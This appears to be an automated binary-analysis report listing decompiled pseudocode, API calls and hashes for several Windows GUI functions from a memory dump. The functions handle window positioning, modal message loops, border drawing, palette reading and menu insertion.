                                                                                0x0042e3dc
                                                                                0x0042e3dc

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042E27E
                                                                                  • Part of subcall function 0041EB60: CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E28F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 0042E29B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E2A2
                                                                                • ReleaseDC.USER32 ref: 0042E2AA
                                                                                • BeginDeferWindowPos.USER32 ref: 0042E302
                                                                                • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042E3A9
                                                                                • EndDeferWindowPos.USER32(?,0042E3E4,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E3D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DeferWindow$ObjectSelect$BeginCreateFontIndirectMetricsReleaseText
                                                                                • String ID:
                                                                                • API String ID: 1262541054-0
                                                                                • Opcode ID: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction ID: e380a197be4a0b5e9c39d3c693654ceb05a77081704d619803c21c70eeb1f8a7
                                                                                • Opcode Fuzzy Hash: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction Fuzzy Hash: 02414E71A001199FCB00DFAED885BAEBBF5EF48315F14406AF904EB391D678AD01CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045227C, Relevance: 12.1, APIs: 8, Instructions: 138windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E0045227C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x45250c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E00433F00();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x486bbc; // 0x41cc7c
					E00406520(_t50,  &_v36);
					E0040A0B0(_v36, 1);
					E00403D80();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x46bb1c; // 0x0
				_v20 = _t58;
				_t59 =  *0x487c00; // 0x22e0f1c
				_t60 =  *0x487c00; // 0x22e0f1c
				E00414020( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x487c00; // 0x22e0f1c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x487c00; // 0x22e0f1c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x487c00; // 0x22e0f1c
				E004536E4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x487c00; // 0x22e0f1c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044C690(0, 0x487bfc, _t122, _t123);
				_push(_t125);
				_push(0x4524ec);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E004521CC(_v8);
				_push(_t125);
				_push(0x45244b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043BD14(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E0045541C( *0x487bfc, _t122, _t123);
					if( *((char*)( *0x487bfc + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E0045212C(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043BD14(_v8), 0xb001, 0, 0);
				_t88 = E0043BD14(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x452452);
				return E004521C4();
			}


























                                                                                0x0045227c
                                                                                0x0045227c
                                                                                0x0045227d
                                                                                0x0045227f
                                                                                0x00452282
                                                                                0x00452283
                                                                                0x00452286
                                                                                0x00452289
                                                                                0x00452293
                                                                                0x00452294
                                                                                0x00452299
                                                                                0x0045229c
                                                                                0x0045229f
                                                                                0x004522ab
                                                                                0x004522d4
                                                                                0x004522d9
                                                                                0x004522e8
                                                                                0x004522ed
                                                                                0x004522ed
                                                                                0x004522f9
                                                                                0x00452307
                                                                                0x00452307
                                                                                0x0045230c
                                                                                0x00452314
                                                                                0x00452320
                                                                                0x00452323
                                                                                0x00452328
                                                                                0x0045232b
                                                                                0x00452333
                                                                                0x0045233d
                                                                                0x00452342
                                                                                0x0045234a
                                                                                0x0045234d
                                                                                0x00452356
                                                                                0x0045235c
                                                                                0x00452361
                                                                                0x00452366
                                                                                0x0045236e
                                                                                0x00452378
                                                                                0x0045237d
                                                                                0x0045237e
                                                                                0x00452383
                                                                                0x00452386
                                                                                0x0045238c
                                                                                0x00452393
                                                                                0x00452394
                                                                                0x00452399
                                                                                0x0045239c
                                                                                0x004523b1
                                                                                0x004523bb
                                                                                0x004523c1
                                                                                0x004523c3
                                                                                0x004523d1
                                                                                0x004523ec
                                                                                0x004523f1
                                                                                0x004523f1
                                                                                0x004523d3
                                                                                0x004523d6
                                                                                0x004523d6
                                                                                0x004523f9
                                                                                0x004523ff
                                                                                0x00452403
                                                                                0x00452418
                                                                                0x00452420
                                                                                0x0045242e
                                                                                0x00452432
                                                                                0x00452432
                                                                                0x00452437
                                                                                0x0045243a
                                                                                0x0045243d
                                                                                0x0045244a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction ID: b629a4e8d731a575979ed138cee1ab300dc18be91145e05793bf1a9acf88d777
                                                                                • Opcode Fuzzy Hash: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction Fuzzy Hash: EB513030A00204AFD711EF6AC946B9E77F1EF49304F1544BAF904AB3A2D778AD44DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439DF0, Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00439DF0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E00433FDC(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043BD14(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043BD14(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E00433FDC(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00436848(_t82, _t99, 0x14, 0);
				E00436848(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00413FA4( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E00439DF0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                                                                0x00439dfb
                                                                                0x00439dfd
                                                                                0x00439dff
                                                                                0x00439e0b
                                                                                0x00439e15
                                                                                0x00439e27
                                                                                0x00439e2c
                                                                                0x00439e30
                                                                                0x00439e45
                                                                                0x00439e5f
                                                                                0x00439e64
                                                                                0x00439e69
                                                                                0x00439e6b
                                                                                0x00439e72
                                                                                0x00439e72
                                                                                0x00439e47
                                                                                0x00439e47
                                                                                0x00439e4e
                                                                                0x00439e4e
                                                                                0x00439e79
                                                                                0x00439e8b
                                                                                0x00439e9a
                                                                                0x00439ea7
                                                                                0x00439ebf
                                                                                0x00439ebf
                                                                                0x00439ecf
                                                                                0x00439edf
                                                                                0x00439ee4
                                                                                0x00439eec
                                                                                0x00439f2b
                                                                                0x00439f30
                                                                                0x00439f35
                                                                                0x00439f41
                                                                                0x00439eee
                                                                                0x00439ef1
                                                                                0x00439ef4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439ef7
                                                                                0x00439efa
                                                                                0x00439f01
                                                                                0x00439f0a
                                                                                0x00439f0f
                                                                                0x00439f13
                                                                                0x00439f1e
                                                                                0x00439f1e
                                                                                0x00439f23
                                                                                0x00439f26
                                                                                0x00439f26
                                                                                0x00439f26
                                                                                0x00000000
                                                                                0x00439f01

                                                                                APIs
                                                                                • SaveDC.GDI32 ref: 00439E06
                                                                                  • Part of subcall function 00433FDC: GetWindowOrgEx.GDI32(?), ref: 00433FEA
                                                                                  • Part of subcall function 00433FDC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434000
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439E27
                                                                                • GetWindowLongA.USER32 ref: 00439E3D
                                                                                • GetWindowLongA.USER32 ref: 00439E5F
                                                                                • SetRect.USER32 ref: 00439E8B
                                                                                • DrawEdge.USER32(?,?,?,00000000), ref: 00439E9A
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439EBF
                                                                                • RestoreDC.GDI32(?,?), ref: 00439F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 2976466617-0
                                                                                • Opcode ID: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction ID: 0a2c6d2463048ccdf29597ec985fa3fb5adccc33b0d18335653a708fa4918e7f
                                                                                • Opcode Fuzzy Hash: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction Fuzzy Hash: 7A416471B001156BDB00EEA9CC81F9E77B8AF48304F10506AFA15EB3C6D67DDD018BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045CC58, Relevance: 12.1, APIs: 8, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045CC58(void* __eax, void* __edx) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t111;

				_t97 = __eax;
				if(__edx == 0) {
					E0041295C(0, _t111, 0);
					E0041295C(1,  &_v12, 1);
					SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E004350E8(_t97);
					_t55 = E004350A4(_t97);
					SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E004350E8(_t97);
					_t63 = E004350A4(_t97);
					return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E0041295C(E0041295C(E004350A4(__eax), _t111, 0) | 0xffffffff,  &_v12, 1);
				SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E004350E8(_t97);
				_t84 = E004350A4(_t97);
				SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E004350E8(_t97);
				_t92 = E004350A4(_t97);
				return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}


















                                                                                0x0045cc5c
                                                                                0x0045cc60
                                                                                0x0045cd10
                                                                                0x0045cd23
                                                                                0x0045cd36
                                                                                0x0045cd53
                                                                                0x0045cd5c
                                                                                0x0045cd64
                                                                                0x0045cd76
                                                                                0x0045cd7f
                                                                                0x0045cd8b
                                                                                0x00000000
                                                                                0x0045cda1
                                                                                0x0045cc82
                                                                                0x0045cc95
                                                                                0x0045ccb2
                                                                                0x0045ccbb
                                                                                0x0045ccc3
                                                                                0x0045ccd5
                                                                                0x0045ccde
                                                                                0x0045ccea
                                                                                0x00000000

                                                                                APIs
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CC95
                                                                                • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCB2
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCD5
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD00
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CD36
                                                                                • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045CD53
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD76
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CDA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ModeViewport
                                                                                • String ID:
                                                                                • API String ID: 3149394475-0
                                                                                • Opcode ID: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction ID: e0da8c87a236fb087fc382737a2b647bc55f7f1c6ba116ed6a76608d3ac074bb
                                                                                • Opcode Fuzzy Hash: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction Fuzzy Hash: 8B315E703043016BD744FB7ACC86B9B26989F48308F00593FB996EB2D7CA7DC8894369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004206FC, Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E004206FC(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E00402994(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0x4207f9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(E00420800);
				return ReleaseDC(0, _v8);
			}














                                                                                0x004206fd
                                                                                0x00420706
                                                                                0x0042070f
                                                                                0x00420723
                                                                                0x0042072f
                                                                                0x00420734
                                                                                0x00420735
                                                                                0x0042073a
                                                                                0x0042073d
                                                                                0x0042074b
                                                                                0x00420750
                                                                                0x00420765
                                                                                0x00420774
                                                                                0x004207db
                                                                                0x00420776
                                                                                0x00420789
                                                                                0x004207a7
                                                                                0x004207bb
                                                                                0x004207bb
                                                                                0x00420774
                                                                                0x004207e2
                                                                                0x004207e5
                                                                                0x004207e8
                                                                                0x004207f8

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042072A
                                                                                • GetDeviceCaps.GDI32(?,00000068), ref: 00420746
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00420765
                                                                                • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00420789
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 004207A7
                                                                                • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 004207BB
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004207DB
                                                                                • ReleaseDC.USER32 ref: 004207F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 1781840570-0
                                                                                • Opcode ID: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction ID: 88d4aa4338388887b010d1d2673664308c814e5b90057e50378935041044e061
                                                                                • Opcode Fuzzy Hash: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction Fuzzy Hash: D12158F1B40328AADB10DB99CD85F9E73BCDB48704F5104A6F705F61C1D678AE509B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00445468, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E00445468(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x4456c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x4456ca);
					E00404320( &_v68);
					return E00404320( &_v12);
				}
				E004043B8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E004472A4(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x46baa0 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0046BA94 |  *0x0046BA84 |  *0x0046BA8C | 0x00000400;
							_t103 = E004472A4(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047D0(_v12));
							} else {
								_t109 = E004047D0( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044596C(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E00447860(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00446E7C(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x46bad4 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0046BACC |  *0x0046BAA8 |  *0x0046BADC |  *0x0046BAE4;
							_v61.fState =  *0x0046BAB4 |  *0x0046BAC4 |  *0x0046BABC;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047D0(_v12);
							if(E004472A4(_t154) > 0) {
								_v61.hSubMenu = E0044596C(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x4456dc);
						E00444ACC( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404698();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x44435c; // 0x4443a8
					_t149 = E00403740( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044596C(_t154);
				goto L8;
			}





















                                                                                0x00445468
                                                                                0x00445473
                                                                                0x00445476
                                                                                0x00445479
                                                                                0x0044547c
                                                                                0x0044547e
                                                                                0x00445482
                                                                                0x00445483
                                                                                0x00445488
                                                                                0x0044548b
                                                                                0x00445492
                                                                                0x004456a5
                                                                                0x004456a7
                                                                                0x004456aa
                                                                                0x004456ad
                                                                                0x004456b5
                                                                                0x004456c2
                                                                                0x004456c2
                                                                                0x0044549e
                                                                                0x004454ac
                                                                                0x004454ba
                                                                                0x004454bf
                                                                                0x00445504
                                                                                0x00445512
                                                                                0x0044565e
                                                                                0x00445666
                                                                                0x0044566b
                                                                                0x0044566d
                                                                                0x004456a0
                                                                                0x0044566f
                                                                                0x00445672
                                                                                0x00445687
                                                                                0x00445687
                                                                                0x00000000
                                                                                0x0044566d
                                                                                0x00445518
                                                                                0x0044551f
                                                                                0x0044552d
                                                                                0x00445531
                                                                                0x00445548
                                                                                0x00445556
                                                                                0x00445556
                                                                                0x00000000
                                                                                0x00445556
                                                                                0x00445552
                                                                                0x00445554
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044555a
                                                                                0x0044555a
                                                                                0x0044555a
                                                                                0x0044555c
                                                                                0x0044555c
                                                                                0x004455ab
                                                                                0x004455d2
                                                                                0x004455d9
                                                                                0x004455de
                                                                                0x004455e3
                                                                                0x004455e8
                                                                                0x004455f3
                                                                                0x004455ff
                                                                                0x00445608
                                                                                0x00445608
                                                                                0x00445614
                                                                                0x00000000
                                                                                0x00445614
                                                                                0x00445531
                                                                                0x004454c1
                                                                                0x004454c4
                                                                                0x004454c6
                                                                                0x004454e0
                                                                                0x004454e0
                                                                                0x004454e3
                                                                                0x004454ef
                                                                                0x004454f4
                                                                                0x004454ff
                                                                                0x00000000
                                                                                0x004454ff
                                                                                0x004454c8
                                                                                0x004454cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004454d1
                                                                                0x004454d7
                                                                                0x004454dc
                                                                                0x004454de
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004454de
                                                                                0x004454b5
                                                                                0x00000000

                                                                                APIs
                                                                                • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00445614
